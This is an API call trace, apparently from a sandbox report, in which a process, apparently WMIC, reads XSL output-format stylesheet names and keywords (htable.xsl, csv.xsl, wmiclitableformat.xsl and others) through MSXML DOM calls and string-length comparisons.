	[0252.670] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.670] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.671] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=3, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.671] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="rawxml.xsl") returned 0x0
	[0252.671] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.671] malloc (_Size=0xc) returned 0x772c68
	[0252.671] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.671] free (_Block=0x772c68) 
	[0252.672] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0
	[0252.672] malloc (_Size=0xc) returned 0x772c98
	[0252.672] malloc (_Size=0xc) returned 0x772b60
	[0252.672] SysStringLen (param_1="RAWXML") returned 0x6
	[0252.672] SysStringLen (param_1="TABLE") returned 0x5
	[0252.672] SysStringLen (param_1="RAWXML") returned 0x6
	[0252.672] SysStringLen (param_1="LIST") returned 0x4
	[0252.672] SysStringLen (param_1="LIST") returned 0x4
	[0252.672] SysStringLen (param_1="RAWXML") returned 0x6
	[0252.672] malloc (_Size=0x18) returned 0x772558
	[0252.672] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.673] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.673] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.673] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=4, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.675] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="htable.xsl") returned 0x0
	[0252.675] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.675] malloc (_Size=0xc) returned 0x772bf0
	[0252.675] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.675] free (_Block=0x772bf0) 
	[0252.676] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0
	[0252.676] malloc (_Size=0xc) returned 0x772b78
	[0252.676] malloc (_Size=0xc) returned 0x772b90
	[0252.676] SysStringLen (param_1="HTABLE") returned 0x6
	[0252.676] SysStringLen (param_1="TABLE") returned 0x5
	[0252.676] SysStringLen (param_1="HTABLE") returned 0x6
	[0252.676] SysStringLen (param_1="LIST") returned 0x4
	[0252.676] malloc (_Size=0x18) returned 0x772478
	[0252.677] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.677] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.677] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.677] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=5, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.677] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="hform.xsl") returned 0x0
	[0252.677] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.677] malloc (_Size=0xc) returned 0x772cb0
	[0252.678] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.678] free (_Block=0x772cb0) 
	[0252.678] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0
	[0252.678] malloc (_Size=0xc) returned 0x772ba8
	[0252.678] malloc (_Size=0xc) returned 0x772c08
	[0252.678] SysStringLen (param_1="HFORM") returned 0x5
	[0252.679] SysStringLen (param_1="TABLE") returned 0x5
	[0252.679] SysStringLen (param_1="HFORM") returned 0x5
	[0252.679] SysStringLen (param_1="LIST") returned 0x4
	[0252.679] SysStringLen (param_1="HFORM") returned 0x5
	[0252.679] SysStringLen (param_1="HTABLE") returned 0x6
	[0252.679] malloc (_Size=0x18) returned 0x772398
	[0252.679] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.679] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.679] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.680] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=6, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.680] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="xml.xsl") returned 0x0
	[0252.680] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.680] malloc (_Size=0xc) returned 0x772bc0
	[0252.680] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.680] free (_Block=0x772bc0) 
	[0252.681] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0
	[0252.681] malloc (_Size=0xc) returned 0x772bc0
	[0252.681] malloc (_Size=0xc) returned 0x772bd8
	[0252.681] SysStringLen (param_1="XML") returned 0x3
	[0252.681] SysStringLen (param_1="TABLE") returned 0x5
	[0252.681] SysStringLen (param_1="XML") returned 0x3
	[0252.681] SysStringLen (param_1="VALUE") returned 0x5
	[0252.681] SysStringLen (param_1="VALUE") returned 0x5
	[0252.681] SysStringLen (param_1="XML") returned 0x3
	[0252.681] malloc (_Size=0x18) returned 0x772518
	[0252.682] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.682] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.682] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.682] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=7, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.682] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="mof.xsl") returned 0x0
	[0252.682] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.683] malloc (_Size=0xc) returned 0x772bf0
	[0252.683] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.683] free (_Block=0x772bf0) 
	[0252.683] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0
	[0252.683] malloc (_Size=0xc) returned 0x772bf0
	[0252.683] malloc (_Size=0xc) returned 0x772c38
	[0252.683] SysStringLen (param_1="MOF") returned 0x3
	[0252.684] SysStringLen (param_1="TABLE") returned 0x5
	[0252.684] SysStringLen (param_1="MOF") returned 0x3
	[0252.684] SysStringLen (param_1="LIST") returned 0x4
	[0252.684] SysStringLen (param_1="MOF") returned 0x3
	[0252.684] SysStringLen (param_1="RAWXML") returned 0x6
	[0252.684] SysStringLen (param_1="LIST") returned 0x4
	[0252.684] SysStringLen (param_1="MOF") returned 0x3
	[0252.684] malloc (_Size=0x18) returned 0x7725b8
	[0252.684] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.684] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.684] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.685] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=8, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.685] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="csv.xsl") returned 0x0
	[0252.685] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.685] malloc (_Size=0xc) returned 0x772c68
	[0252.685] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.685] free (_Block=0x772c68) 
	[0252.686] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0
	[0252.686] malloc (_Size=0xc) returned 0x772c68
	[0252.686] malloc (_Size=0xc) returned 0x772cb0
	[0252.686] SysStringLen (param_1="CSV") returned 0x3
	[0252.686] SysStringLen (param_1="TABLE") returned 0x5
	[0252.686] SysStringLen (param_1="CSV") returned 0x3
	[0252.686] SysStringLen (param_1="LIST") returned 0x4
	[0252.686] SysStringLen (param_1="CSV") returned 0x3
	[0252.686] SysStringLen (param_1="HTABLE") returned 0x6
	[0252.686] SysStringLen (param_1="CSV") returned 0x3
	[0252.686] SysStringLen (param_1="HFORM") returned 0x5
	[0252.687] malloc (_Size=0x18) returned 0x772498
	[0252.687] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.687] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.687] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.687] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=9, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.687] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="texttable.xsl") returned 0x0
	[0252.688] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.688] malloc (_Size=0xc) returned 0x772cc8
	[0252.688] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.688] free (_Block=0x772cc8) 
	[0252.688] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0
	[0252.688] malloc (_Size=0xc) returned 0x772cc8
	[0252.689] malloc (_Size=0xc) returned 0x778980
	[0252.690] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.690] SysStringLen (param_1="TABLE") returned 0x5
	[0252.690] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.690] SysStringLen (param_1="VALUE") returned 0x5
	[0252.690] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.690] SysStringLen (param_1="XML") returned 0x3
	[0252.690] SysStringLen (param_1="XML") returned 0x3
	[0252.690] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.690] malloc (_Size=0x18) returned 0x772658
	[0252.690] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.691] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.691] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.691] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=10, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.691] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="texttable.xsl") returned 0x0
	[0252.691] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.691] malloc (_Size=0xc) returned 0x7788d8
	[0252.692] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.692] free (_Block=0x7788d8) 
	[0252.692] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0
	[0252.692] malloc (_Size=0xc) returned 0x778788
	[0252.692] malloc (_Size=0xc) returned 0x778908
	[0252.692] SysStringLen (param_1="texttablewsys") returned 0xd
	[0252.692] SysStringLen (param_1="TABLE") returned 0x5
	[0252.693] SysStringLen (param_1="texttablewsys") returned 0xd
	[0252.693] SysStringLen (param_1="XML") returned 0x3
	[0252.693] SysStringLen (param_1="texttablewsys") returned 0xd
	[0252.693] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.693] SysStringLen (param_1="XML") returned 0x3
	[0252.693] SysStringLen (param_1="texttablewsys") returned 0xd
	[0252.693] malloc (_Size=0x18) returned 0x772358
	[0252.693] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.694] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.694] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.694] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=11, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.694] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="texttable.xsl") returned 0x0
	[0252.694] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.694] malloc (_Size=0xc) returned 0x7787d0
	[0252.695] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.695] free (_Block=0x7787d0) 
	[0252.695] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0
	[0252.695] malloc (_Size=0xc) returned 0x778770
	[0252.695] malloc (_Size=0xc) returned 0x778710
	[0252.695] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.695] SysStringLen (param_1="TABLE") returned 0x5
	[0252.695] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.696] SysStringLen (param_1="XML") returned 0x3
	[0252.696] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.696] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.696] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.696] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.696] malloc (_Size=0x18) returned 0x7723f8
	[0252.696] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.696] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.697] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.697] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=12, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.697] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="texttable.xsl") returned 0x0
	[0252.697] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.697] malloc (_Size=0xc) returned 0x778968
	[0252.697] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.697] free (_Block=0x778968) 
	[0252.698] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0
	[0252.698] malloc (_Size=0xc) returned 0x778758
	[0252.698] malloc (_Size=0xc) returned 0x7787d0
	[0252.698] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0252.698] SysStringLen (param_1="TABLE") returned 0x5
	[0252.698] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0252.698] SysStringLen (param_1="XML") returned 0x3
	[0252.698] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0252.698] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.698] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0252.698] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.699] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.699] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0252.699] malloc (_Size=0x18) returned 0x772638
	[0252.699] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.699] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.699] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.699] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=13, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.699] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="texttable.xsl") returned 0x0
	[0252.700] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.700] malloc (_Size=0xc) returned 0x7787a0
	[0252.700] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.700] free (_Block=0x7787a0) 
	[0252.700] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0
	[0252.700] malloc (_Size=0xc) returned 0x7787a0
	[0252.700] malloc (_Size=0xc) returned 0x7787b8
	[0252.701] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0252.701] SysStringLen (param_1="TABLE") returned 0x5
	[0252.701] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0252.701] SysStringLen (param_1="XML") returned 0x3
	[0252.701] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0252.701] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.701] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0252.701] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.701] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.701] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0252.701] malloc (_Size=0x18) returned 0x7723d8
	[0252.701] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.702] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.702] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.702] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=14, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.702] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="texttable.xsl") returned 0x0
	[0252.702] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.702] malloc (_Size=0xc) returned 0x778728
	[0252.703] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.703] free (_Block=0x778728) 
	[0252.703] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0
	[0252.703] malloc (_Size=0xc) returned 0x778950
	[0252.703] malloc (_Size=0xc) returned 0x7787e8
	[0252.703] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0252.703] SysStringLen (param_1="TABLE") returned 0x5
	[0252.703] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0252.704] SysStringLen (param_1="XML") returned 0x3
	[0252.704] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0252.704] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.704] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0252.704] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.704] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0252.704] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0252.704] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.829] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0252.829] malloc (_Size=0x18) returned 0x7725f8
	[0252.829] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.829] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.830] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.831] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=15, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.831] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="htable.xsl") returned 0x0
	[0252.831] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.831] malloc (_Size=0xc) returned 0x778800
	[0252.832] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.832] free (_Block=0x778800) 
	[0252.832] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0
	[0252.832] malloc (_Size=0xc) returned 0x778800
	[0252.832] malloc (_Size=0xc) returned 0x778698
	[0252.832] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0252.832] SysStringLen (param_1="TABLE") returned 0x5
	[0252.833] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0252.833] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.833] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0252.833] SysStringLen (param_1="XML") returned 0x3
	[0252.833] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0252.833] SysStringLen (param_1="texttablewsys") returned 0xd
	[0252.833] SysStringLen (param_1="XML") returned 0x3
	[0252.833] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0252.833] malloc (_Size=0x18) returned 0x7726b8
	[0252.833] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.834] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.834] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.834] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=16, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.834] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="htable.xsl") returned 0x0
	[0252.834] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.834] malloc (_Size=0xc) returned 0x778740
	[0252.835] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.835] free (_Block=0x778740) 
	[0252.835] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0
	[0252.835] malloc (_Size=0xc) returned 0x778830
	[0252.835] malloc (_Size=0xc) returned 0x778818
	[0252.835] SysStringLen (param_1="htable-sortby") returned 0xd
	[0252.835] SysStringLen (param_1="TABLE") returned 0x5
	[0252.835] SysStringLen (param_1="htable-sortby") returned 0xd
	[0252.835] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.836] SysStringLen (param_1="htable-sortby") returned 0xd
	[0252.836] SysStringLen (param_1="XML") returned 0x3
	[0252.836] SysStringLen (param_1="htable-sortby") returned 0xd
	[0252.836] SysStringLen (param_1="texttablewsys") returned 0xd
	[0252.836] SysStringLen (param_1="htable-sortby") returned 0xd
	[0252.836] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0252.836] SysStringLen (param_1="XML") returned 0x3
	[0252.836] SysStringLen (param_1="htable-sortby") returned 0xd
	[0252.836] malloc (_Size=0x18) returned 0x772698
	[0252.836] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.837] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.837] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.837] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=17, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.837] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="mof.xsl") returned 0x0
	[0252.837] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.837] malloc (_Size=0xc) returned 0x778920
	[0252.837] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.838] free (_Block=0x778920) 
	[0252.838] IXMLDOMNode:get_nodeValue (in: This=0xc89ff8, value=0xcf6ac | out: value=0xcf6ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0
	[0252.838] malloc (_Size=0xc) returned 0x778848
	[0252.838] malloc (_Size=0xc) returned 0x778968
	[0252.838] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0252.838] SysStringLen (param_1="TABLE") returned 0x5
	[0252.838] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0252.838] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.838] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0252.839] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0252.839] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0252.839] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0252.839] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0252.839] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0252.839] malloc (_Size=0x18) returned 0x7724b8
	[0252.839] IUnknown:Release (This=0xc86b88) returned 0x0
	[0252.839] IUnknown:Release (This=0xc89fa8) returned 0x0
	[0252.840] IUnknown:Release (This=0xc89ff8) returned 0x0
	[0252.840] IXMLDOMNodeList:get_item (in: This=0xc89ca0, index=18, listItem=0xcf6f4 | out: listItem=0xcf6f4*=0xc86b88) returned 0x0
	[0252.840] IXMLDOMNode:get_text (in: This=0xc86b88, text=0xcf6f8 | out: text=0xcf6f8*="mof.xsl") returned 0x0
	[0252.840] IXMLDOMNode:get_attributes (in: This=0xc86b88, attributeMap=0xcf6f0 | out: attributeMap=0xcf6f0*=0xc89fa8) returned 0x0
	[0252.840] malloc (_Size=0xc) returned 0x778740
	[0252.840] IXMLDOMNamedNodeMap:getNamedItem (in: This=0xc89fa8, name="KEYWORD", namedItem=0xcf6ec | out: namedItem=0xcf6ec*=0xc89ff8) returned 0x0
	[0252.840] free (_Block=0x778740) 
